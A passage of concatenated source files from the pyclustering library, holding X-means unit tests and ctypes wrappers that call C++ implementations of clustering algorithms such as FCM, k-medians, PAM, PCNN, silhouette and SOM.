XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, None, [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, alpha=0.1, beta=0.1)
def testMndlWrongStartClusterAllocationSampleSimple1(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, [[3.7, 5.5]], [5, 5], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, alpha=0.1, beta=0.1)
def testBicClusterAllocationSampleSimple2(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [[3.5, 4.8], [6.9, 7], [7.5, 0.5]], [10, 5, 8], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationSampleSimple2Repeat(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [[3.5, 4.8], [6.9, 7], [7.5, 0.5]], [10, 5, 8], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, repeat=5)
def testBicWrongStartClusterAllocationSampleSimple2(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [[3.5, 4.8], [6.9, 7]], [10, 5, 8], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testMndlClusterAllocationSampleSimple2(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [[3.5, 4.8], [6.9, 7], [7.5, 0.5]], [10, 5, 8], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, alpha=0.1, beta=0.1)
def testMndlWrongStartClusterAllocationSampleSimple2(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, [[3.5, 4.8], [6.9, 7]], [10, 5, 8], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, alpha=0.1, beta=0.1)
def testBicClusterAllocationSampleSimple3(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]], [10, 10, 10, 30], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationSampleSimple3Repeat(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]], [10, 10, 10, 30], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, repeat=5)
def testBicWrongStartClusterAllocationSampleSimple3(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [[0.2, 0.1], [4.0, 1.0], [5.9, 5.9]], [10, 10, 10, 30], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationMaxLessRealSampleSimple3(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [[4.0, 1.0], [2.0, 2.0], [2.3, 3.9]], None, splitting_type.BAYESIAN_INFORMATION_CRITERION, 3, False)
def testBicWrongStartClusterClusterAllocationSampleSimple3(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [[4.0, 1.0], [2.0, 2.0], [2.3, 3.9]], [10, 10, 10, 30], splitting_type.BAYESIAN_INFORMATION_CRITERION, 4, False)
def testMndlClusterAllocationSampleSimple3(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]], [10, 10, 10, 30], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, alpha=0.2, beta=0.2)
def testMndlWrongStartClusterClusterAllocationSampleSimple3(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, [[4.0, 1.0], [2.0, 2.0], [2.3, 3.9]], [10, 10, 10, 30], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 4, False, alpha=0.2, beta=0.2)
def testBicClusterAllocationSampleSimple4(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, [[1.5, 0.0], [1.5, 2.0], [1.5, 4.0], [1.5, 6.0], [1.5, 8.0]], [15, 15, 15, 15, 15], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationSampleSimple4Repeat(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, [[1.5, 0.0], [1.5, 2.0], [1.5, 4.0], [1.5, 6.0], [1.5, 8.0]], [15, 15, 15, 15, 15], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, repeat=5)
def testBicWrongStartClusterAllocationSampleSimple4(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, [[1.5, 0.0], [1.5, 2.0], [1.5, 4.0], [1.5, 6.0]], [15, 15, 15, 15, 15], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationMaxLessRealSampleSimple4(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, [[1.5, 4.0]], None, splitting_type.BAYESIAN_INFORMATION_CRITERION, 2, False)
def testMndlClusterAllocationSampleSimple4(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, [[1.5, 0.0], [1.5, 2.0], [1.5, 4.0], [1.5, 6.0], [1.5, 8.0]], [15, 15, 15, 15, 15], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False)
def testMndlWrongStartClusterAllocationSampleSimple4(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, [[1.5, 0.0], [1.5, 2.0], [1.5, 4.0], [1.5, 6.0]], [15, 15, 15, 15, 15], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False)
def testMndlClusterAllocationMaxLessRealSampleSimple4(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, [[1.5, 4.0]], None, splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 2, False)
def testBicClusterAllocationSampleSimple5(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, [[0.0, 1.0], [0.0, 0.0], [1.0, 1.0], [1.0, 0.0]], [15, 15, 15, 15], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicWrongStartClusterAllocationSampleSimple5(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, [[0.0, 1.0], [0.0, 0.0]], [15, 15, 15, 15], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testMndlClusterAllocationSampleSimple5(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, [[0.0, 1.0], [0.0, 0.0], [1.0, 1.0], [1.0, 0.0]], [15, 15, 15, 15], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, random_state=1000)
def testMndlWrongStartClusterAllocationSampleSimple5(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, [[0.0, 1.0], [0.0, 0.0]], [15, 15, 15, 15], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, random_state=1000)
def testBicClusterAllocationSampleSimple6(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, [[3.5, 3.5], [3.7, 3.7]], [20, 21], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationSampleSimple6WithoutInitial(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, None, [20, 21], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testMndlClusterAllocationSampleSimple6(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, [[3.5, 3.5], [3.7, 3.7]], [20, 21], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False)
def testMndlClusterAllocationSampleSimple6WithoutInitial(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, None, [20, 21], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False)
def testBicClusterAllocationSampleSimple7(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, [[1], [2]], [10, 10], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationSampleSimple7WithoutInitial(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, None, [10, 10], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testMndlClusterAllocationSampleSimple7(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, [[1], [2]], [10, 10], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, alpha=0.01, beta=0.01)
def testMndlClusterAllocationSampleSimple7WithoutInitial(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, None, [10, 10], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, alpha=0.01, beta=0.01)
def testBicClusterAllocationSampleSimple8(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, [[-2.0], [3.0], [6.0], [12.0]], [15, 30, 20, 80], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationSampleSimple8WrongAmountCenters(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, [[3.0], [6.0]], [15, 30, 20, 80], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testMndlClusterAllocationSampleSimple8WrongAmountCenters(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, [[3.0], [6.0]], [15, 30, 20, 80], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False, alpha=0.2, beta=0.2)
def testBicClusterAllocationSampleSimple8WrongAmountCentersRandomState(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, [[3.0], [6.0]], [15, 30, 20, 80], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, random_state=1000)
def testMndlClusterAllocationSampleSimple8WrongAmountCentersRandomState(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE8, [[3.0], [6.0]], [15, 30, 20, 80], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False, random_state=1000)
def testBicClusterAllocationSampleSimple9(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, [[3.0], [6.0]], [10, 20], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationSampleSimple9WithoutInitial(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, None, [10, 20], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationSampleSimple10(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, [[0.0, 0.3], [4.5, 3.4], [10.1, 10.6]], [11, 11, 11], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationSampleSimple10WithoutInitial(self):
XmeansTestTemplates.templateLengthProcessData(SIMPLE_SAMPLES.SAMPLE_SIMPLE10, None, [11, 11, 11], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicClusterAllocationSampleTwoDiamonds(self):
XmeansTestTemplates.templateLengthProcessData(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, [[0.8, 0.2], [3.0, 0.0]], [400, 400], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testBicWrongStartClusterAllocationSampleTwoDiamonds(self):
XmeansTestTemplates.templateLengthProcessData(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, [[0.8, 0.2]], [400, 400], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testMndlClusterAllocationSampleTwoDiamonds(self):
XmeansTestTemplates.templateLengthProcessData(FCPS_SAMPLES.SAMPLE_TWO_DIAMONDS, [[0.8, 0.2], [3.0, 0.0]], [400, 400], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False)
def testMathErrorDomainBic(self):
# This is test for bug that was found in #407: 0.0 under logarithm function.
XmeansTestTemplates.templateLengthProcessData([[0], [0], [10], [10], [20], [20]], [[5], [20]], [2, 2, 2], splitting_type.BAYESIAN_INFORMATION_CRITERION, 20, False)
def testMathErrorDomainMndl(self):
XmeansTestTemplates.templateLengthProcessData([[0], [0], [10], [10], [20], [20]], [[5], [20]], [2, 2, 2], splitting_type.MINIMUM_NOISELESS_DESCRIPTION_LENGTH, 20, False)
def testClusterAllocationOneDimensionData(self):
XmeansTestTemplates.templateClusterAllocationOneDimensionData(False)
def testKmax05Amount3Offset02Initial01(self):
XmeansTestTemplates.templateMaxAllocatedClusters(False, 10, 3, 2, 1, 2)
def testKmax05Amount5Offset02Initial01(self):
XmeansTestTemplates.templateMaxAllocatedClusters(False, 10, 5, 2, 1, 5)
def testKmax05Amount5Offset02Initial02(self):
XmeansTestTemplates.templateMaxAllocatedClusters(False, 10, 5, 2, 2, 5)
def testKmax05Amount10Offset02Initial03(self):
XmeansTestTemplates.templateMaxAllocatedClusters(False, 10, 10, 2, 3, 5)
def testKmax05Amount10Offset02Initial04(self):
XmeansTestTemplates.templateMaxAllocatedClusters(False, 10, 10, 2, 4, 5)
def testKmax05Amount10Offset02Initial05(self):
XmeansTestTemplates.templateMaxAllocatedClusters(False, 10, 10, 2, 5, 5)
def testKmax05Amount20Offset02Initial05(self):
XmeansTestTemplates.templateMaxAllocatedClusters(False, 20, 10, 2, 5, 5)
def testKmax05Amount01Offset01Initial04(self):
XmeansTestTemplates.templateMaxAllocatedClusters(False, 1, 1000, 1, 4, 5)
def testPredictOnePoint(self):
centers = [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]]
XmeansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[0.3, 0.2]], 4, [0], False)
XmeansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[4.1, 1.1]], 4, [1], False)
XmeansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[2.1, 1.9]], 4, [2], False)
XmeansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[2.1, 4.1]], 4, [3], False)
def testPredictTwoPoints(self):
centers = [[0.2, 0.1], [4.0, 1.0], [2.0, 2.0], [2.3, 3.9]]
XmeansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[0.3, 0.2], [2.1, 1.9]], 4, [0, 2], False)
XmeansTestTemplates.templatePredict(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, centers, [[2.1, 4.1], [2.1, 1.9]], 4, [3, 2], False)
def test_random_state_1(self):
XmeansTestTemplates.random_state(False, 2, 10, 1)
def test_random_state_2(self):
XmeansTestTemplates.random_state(False, 2, 10, 2)
def test_random_state_4(self):
XmeansTestTemplates.random_state(False, 2, 10, 4)
def test_random_state_32(self):
XmeansTestTemplates.random_state(False, 2, 10, 32)
def test_random_state_1024(self):
XmeansTestTemplates.random_state(False, 2, 10, 1024)
def test_random_state_65536(self):
XmeansTestTemplates.random_state(False, 2, 10, 65536)
def test_incorrect_data(self):
self.assertRaises(ValueError, xmeans, [])
def test_incorrect_centers(self):
self.assertRaises(ValueError, xmeans, [[0], [1], [2]], [])
def test_incorrect_tolerance(self):
self.assertRaises(ValueError, xmeans, [[0], [1], [2]], [[1]], 20, -1)
def test_incorrect_repeat(self):
self.assertRaises(ValueError, xmeans, [[0], [1], [2]], repeat=0)
```
#### File: container/tests/__init__.py
```python
from pyclustering.tests.suite_holder import suite_holder
from pyclustering.container.tests.unit import container_unit_tests
class container_tests(suite_holder):
def __init__(self):
super().__init__()
container_unit_tests.fill_suite(self.get_suite())
@staticmethod
def fill_suite(container_suite):
container_unit_tests.fill_suite(container_suite)
```
#### File: pyclustering/core/agglomerative_wrapper.py
```python
from ctypes import c_size_t, c_double, POINTER;
from pyclustering.core.wrapper import ccore_library;
from pyclustering.core.pyclustering_package import pyclustering_package, package_extractor, package_builder;
def agglomerative_algorithm(data, number_clusters, link):
pointer_data = package_builder(data, c_double).create();
ccore = ccore_library.get();
ccore.agglomerative_algorithm.restype = POINTER(pyclustering_package);
package = ccore.agglomerative_algorithm(pointer_data, c_size_t(number_clusters), c_size_t(link));
result = package_extractor(package).extract();
ccore.free_pyclustering_package(package);
return result;
```
#### File: pyclustering/core/fcm_wrapper.py
```python
from ctypes import c_double, c_size_t, POINTER
from pyclustering.core.wrapper import ccore_library
from pyclustering.core.pyclustering_package import pyclustering_package, package_extractor, package_builder
class fcm_package_indexer:
INDEX_CLUSTERS = 0
INDEX_CENTERS = 1
INDEX_MEMBERSHIP = 2
def fcm_algorithm(sample, centers, m, tolerance, itermax):
pointer_data = package_builder(sample, c_double).create()
pointer_centers = package_builder(centers, c_double).create()
ccore = ccore_library.get()
ccore.fcm_algorithm.restype = POINTER(pyclustering_package)
package = ccore.fcm_algorithm(pointer_data, pointer_centers, c_double(m), c_double(tolerance), c_size_t(itermax))
result = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return result
```
#### File: pyclustering/core/kmedians_wrapper.py
```python
from ctypes import c_double, c_size_t, POINTER
from pyclustering.core.wrapper import ccore_library
from pyclustering.core.pyclustering_package import pyclustering_package, package_extractor, package_builder
def kmedians(sample, centers, tolerance, itermax, metric_pointer):
pointer_data = package_builder(sample, c_double).create()
pointer_centers = package_builder(centers, c_double).create()
ccore = ccore_library.get()
ccore.kmedians_algorithm.restype = POINTER(pyclustering_package)
package = ccore.kmedians_algorithm(pointer_data, pointer_centers, c_double(tolerance), c_size_t(itermax), metric_pointer)
result = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return result[0], result[1]
```
#### File: pyclustering/core/metric_wrapper.py
```python
from pyclustering.core.wrapper import ccore_library
from pyclustering.core.pyclustering_package import package_builder, package_extractor, pyclustering_package
from ctypes import c_double, c_size_t, POINTER, c_void_p, CFUNCTYPE
from pyclustering.utils.metric import type_metric
metric_callback = CFUNCTYPE(c_double, POINTER(pyclustering_package), POINTER(pyclustering_package))
class metric_wrapper:
def __init__(self, type_metric_code, arguments, func):
self.__func = lambda p1, p2: func(package_extractor(p1).extract(), package_extractor(p2).extract())
package_arguments = package_builder(arguments, c_double).create()
ccore = ccore_library.get()
ccore.metric_create.restype = POINTER(c_void_p)
self.__pointer = ccore.metric_create(c_size_t(type_metric_code), package_arguments, metric_callback(self.__func))
def __del__(self):
if self.__pointer:
ccore = ccore_library.get()
ccore.metric_destroy(self.__pointer)
def __call__(self, point1, point2):
point_package1 = package_builder(point1, c_double).create()
point_package2 = package_builder(point2, c_double).create()
ccore = ccore_library.get()
ccore.metric_calculate.restype = c_double
return ccore.metric_calculate(self.__pointer, point_package1, point_package2)
def get_pointer(self):
return self.__pointer
@staticmethod
def create_instance(metric):
mtype = metric.get_type()
arguments = []
if mtype == type_metric.MINKOWSKI:
arguments = [metric.get_arguments().get('degree')]
elif mtype == type_metric.GOWER:
arguments = metric.get_arguments().get('max_range')
return metric_wrapper(mtype, arguments, metric.get_function())
```
#### File: pyclustering/core/pam_build_wrapper.py
```python
from ctypes import c_double, c_size_t, POINTER
from pyclustering.core.converter import convert_data_type
from pyclustering.core.wrapper import ccore_library
from pyclustering.core.pyclustering_package import pyclustering_package, package_builder, package_extractor
def pam_build(sample, amount, pointer_metric, data_type):
pointer_data = package_builder(sample, c_double).create()
c_data_type = convert_data_type(data_type)
ccore = ccore_library.get()
ccore.pam_build_algorithm.restype = POINTER(pyclustering_package)
package = ccore.pam_build_algorithm(pointer_data, c_size_t(amount), pointer_metric, c_data_type)
results = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
if isinstance(results, bytes):
raise RuntimeError(results.decode('utf-8'))
return results[0]
```
#### File: pyclustering/core/pcnn_wrapper.py
```python
from pyclustering.core.wrapper import *;
from pyclustering.core.pyclustering_package import package_builder, package_extractor, pyclustering_package;
class c_pcnn_parameters(Structure):
_fields_ = [
("VF", c_double),
("VL", c_double),
("VT", c_double),
("AF", c_double),
("AL", c_double),
("AT", c_double),
("W", c_double),
("M", c_double),
("B", c_double),
("FAST_LINKING", c_bool)
];
def pcnn_create(size, conn_type, height, width, params):
ccore = ccore_library.get();
c_parameters = c_pcnn_parameters();
c_parameters.VF = params.VF;
c_parameters.VL = params.VL;
c_parameters.VT = params.VT;
c_parameters.AF = params.AF;
c_parameters.AL = params.AL;
c_parameters.AT = params.AT;
c_parameters.W = params.W;
c_parameters.M = params.M;
c_parameters.FAST_LINKING = params.FAST_LINKING;
ccore.pcnn_create.restype = POINTER(c_void_p);
pcnn_pointer = ccore.pcnn_create(c_uint(size), c_uint(conn_type), c_uint(height), c_uint(width), pointer(c_parameters));
return pcnn_pointer;
def pcnn_destroy(network_pointer):
ccore = ccore_library.get();
ccore.pcnn_destroy(network_pointer);
def pcnn_simulate(network_pointer, steps, stimulus):
ccore = ccore_library.get();
c_stimulus = package_builder(stimulus, c_double).create();
ccore.pcnn_simulate.restype = POINTER(c_void_p);
return ccore.pcnn_simulate(network_pointer, c_uint(steps), c_stimulus);
def pcnn_get_size(network_pointer):
ccore = ccore_library.get();
ccore.pcnn_get_size.restype = c_size_t;
return ccore.pcnn_get_size(network_pointer);
def pcnn_dynamic_destroy(dynamic_pointer):
ccore = ccore_library.get();
ccore.pcnn_dynamic_destroy(dynamic_pointer);
def pcnn_dynamic_allocate_sync_ensembles(dynamic_pointer):
ccore = ccore_library.get();
ccore.pcnn_dynamic_allocate_sync_ensembles.restype = POINTER(pyclustering_package);
package = ccore.pcnn_dynamic_allocate_sync_ensembles(dynamic_pointer);
result = package_extractor(package).extract();
ccore.free_pyclustering_package(package);
return result;
def pcnn_dynamic_allocate_spike_ensembles(dynamic_pointer):
ccore = ccore_library.get();
ccore.pcnn_dynamic_allocate_spike_ensembles.restype = POINTER(pyclustering_package);
package = ccore.pcnn_dynamic_allocate_spike_ensembles(dynamic_pointer);
result = package_extractor(package).extract();
ccore.free_pyclustering_package(package);
return result;
def pcnn_dynamic_allocate_time_signal(dynamic_pointer):
ccore = ccore_library.get();
ccore.pcnn_dynamic_allocate_time_signal.restype = POINTER(pyclustering_package);
package = ccore.pcnn_dynamic_allocate_time_signal(dynamic_pointer);
result = package_extractor(package).extract();
ccore.free_pyclustering_package(package);
return result;
def pcnn_dynamic_get_output(dynamic_pointer):
ccore = ccore_library.get();
ccore.pcnn_dynamic_get_output.restype = POINTER(pyclustering_package);
package = ccore.pcnn_dynamic_get_output(dynamic_pointer);
result = package_extractor(package).extract();
ccore.free_pyclustering_package(package);
return result;
def pcnn_dynamic_get_time(dynamic_pointer):
ccore = ccore_library.get();
ccore.pcnn_dynamic_get_time.restype = POINTER(pyclustering_package);
package = ccore.pcnn_dynamic_get_time(dynamic_pointer);
result = package_extractor(package).extract();
ccore.free_pyclustering_package(package);
return result;
def pcnn_dynamic_get_size(dynamic_pointer):
ccore = ccore_library.get();
ccore.pcnn_dynamic_get_time.restype = c_size_t;
return ccore.pcnn_dynamic_get_size(dynamic_pointer);
```
#### File: pyclustering/core/silhouette_wrapper.py
```python
from ctypes import c_double, c_longlong, c_size_t, POINTER
from pyclustering.core.converter import convert_data_type
from pyclustering.core.wrapper import ccore_library
from pyclustering.core.pyclustering_package import pyclustering_package, package_builder, package_extractor
class silhouette_ksearch_package_indexer:
SILHOUETTE_KSEARCH_PACKAGE_INDEX_AMOUNT = 0
SILHOUETTE_KSEARCH_PACKAGE_INDEX_SCORE = 1
SILHOUETTE_KSEARCH_PACKAGE_INDEX_SCORES = 2
def silhoeutte(sample, clusters, pointer_metric, data_type):
pointer_data = package_builder(sample, c_double).create()
pointer_clusters = package_builder(clusters, c_size_t).create()
c_data_type = convert_data_type(data_type)
ccore = ccore_library.get()
ccore.silhouette_algorithm.restype = POINTER(pyclustering_package)
package = ccore.silhouette_algorithm(pointer_data, pointer_clusters, pointer_metric, c_data_type)
result = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return result
def silhoeutte_ksearch(sample, kmin, kmax, allocator, random_state):
random_state = random_state or -1
pointer_data = package_builder(sample, c_double).create()
ccore = ccore_library.get()
ccore.silhouette_ksearch_algorithm.restype = POINTER(pyclustering_package)
package = ccore.silhouette_ksearch_algorithm(pointer_data, c_size_t(kmin), c_size_t(kmax), c_size_t(allocator), c_longlong(random_state))
results = package_extractor(package).extract()
ccore.free_pyclustering_package(package)
return (results[silhouette_ksearch_package_indexer.SILHOUETTE_KSEARCH_PACKAGE_INDEX_AMOUNT][0],
results[silhouette_ksearch_package_indexer.SILHOUETTE_KSEARCH_PACKAGE_INDEX_SCORE][0],
results[silhouette_ksearch_package_indexer.SILHOUETTE_KSEARCH_PACKAGE_INDEX_SCORES])
```
#### File: pyclustering/core/som_wrapper.py
```python
from ctypes import Structure, c_longlong, c_uint, c_size_t, c_double, c_void_p, pointer, POINTER
from pyclustering.core.wrapper import ccore_library
from pyclustering.core.pyclustering_package import pyclustering_package, package_builder, package_extractor
class c_som_parameters(Structure):
"""!
@brief Description of SOM parameters in memory.
@details The following memory mapping is used in order to store the structure:
@code
struct som_params {
unsigned int init_type;
double init_radius;
double init_learn_rate;
double adaptation_threshold;
long long random_state;
};
@endcode
"""
_fields_ = [("init_type", c_uint),
("init_radius", c_double),
("init_learn_rate", c_double),
("adaptation_threshold", c_double),
("random_state", c_longlong)]
def som_create(rows, cols, conn_type, parameters):
"""!
@brief Create of self-organized map using C++ pyclustering library.
@param[in] rows (uint): Number of neurons in the column (number of rows).
@param[in] cols (uint): Number of neurons in the row (number of columns).
@param[in] conn_type (type_conn): Type of connection between oscillators in the network (grid four, grid eight, honeycomb, function neighbour).
@param[in] parameters (som_parameters): Other specific parameters.
@return (POINTER) C-pointer to object of self-organized feature in memory.
"""
ccore = ccore_library.get()
c_params = c_som_parameters()
c_params.init_type = parameters.init_type
c_params.init_radius = parameters.init_radius
c_params.init_learn_rate = parameters.init_learn_rate
c_params.adaptation_threshold = parameters.adaptation_threshold
c_params.random_state = parameters.random_state or -1
ccore.som_create.restype = POINTER(c_void_p)
som_pointer = ccore.som_create(c_uint(rows), c_uint(cols), c_uint(conn_type), pointer(c_params))
return som_pointer
def som_load(som_pointer, weights, award, capture_objects):
"""!
@brief Load dump of the network to SOM.
@details Initialize SOM using existed weights, amount of captured objects by each neuron, captured
objects by each neuron. Initialization is not performed if weights are empty.
@param[in] som_pointer (POINTER): pointer to object of self-organized map.
@param[in] weights (list): weights that should assigned to neurons.
@param[in] awards (list): amount of captured objects by each neuron.
@param[in] capture_objects (list): captured objects by each neuron.
"""
if len(weights) == 0:
return
ccore = ccore_library.get()
package_weights = package_builder(weights, c_double).create()
package_award = package_builder(award, c_size_t).create()
package_capture_objects = package_builder(capture_objects, c_size_t).create()
ccore.som_load(som_pointer, package_weights, package_award, package_capture_objects)
def som_destroy(som_pointer):
"""!
@brief Destroys self-organized map.
@param[in] som_pointer (POINTER): pointer to object of self-organized map.
"""
ccore = ccore_library.get()
ccore.som_destroy(som_pointer)
def som_train(som_pointer, data, epochs, autostop):
"""!
@brief Trains self-organized feature map (SOM) using CCORE pyclustering library.
@param[in] data (list): Input data - list of points where each point is represented by list of features, for example coordinates.
@param[in] epochs (uint): Number of epochs for training.
@param[in] autostop (bool): Automatic termination of learining process when adaptation is not occurred.
@return (uint) Number of learining iterations.
"""
pointer_data = package_builder(data, c_double).create()
ccore = ccore_library.get()
ccore.som_train.restype = c_size_t
return ccore.som_train(som_pointer, pointer_data, c_uint(epochs), autostop)
def som_simulate(som_pointer, pattern):
"""!
@brief Processes input pattern (no learining) and returns index of neuron-winner.
@details Using index of neuron winner catched object can be obtained using property capture_objects.
@param[in] som_pointer (c_pointer): pointer to object of self-organized map.
@param[in] pattern (list): input pattern.
@return Returns index of neuron-winner.
"""
pointer_data = package_builder(pattern, c_double).create()
ccore = ccore_library.get()
ccore.som_simulate.restype = c_size_t
return ccore.som_simulate(som_pointer, pointer_data)
def som_get_winner_number(som_pointer):
"""!
@brief Returns of number of winner at the last step of learning process.
@param[in] som_pointer (c_pointer): pointer to object of self-organized map.
"""
ccore = ccore_library.get()
ccore.som_get_winner_number.restype = c_size_t
return ccore.som_get_winner_number(som_pointer)
def som_get_size(som_pointer):
"""!
@brief Returns size of self-organized map (number of neurons).
@param[in] som_pointer (c_pointer): pointer to object of self-organized map.
"""
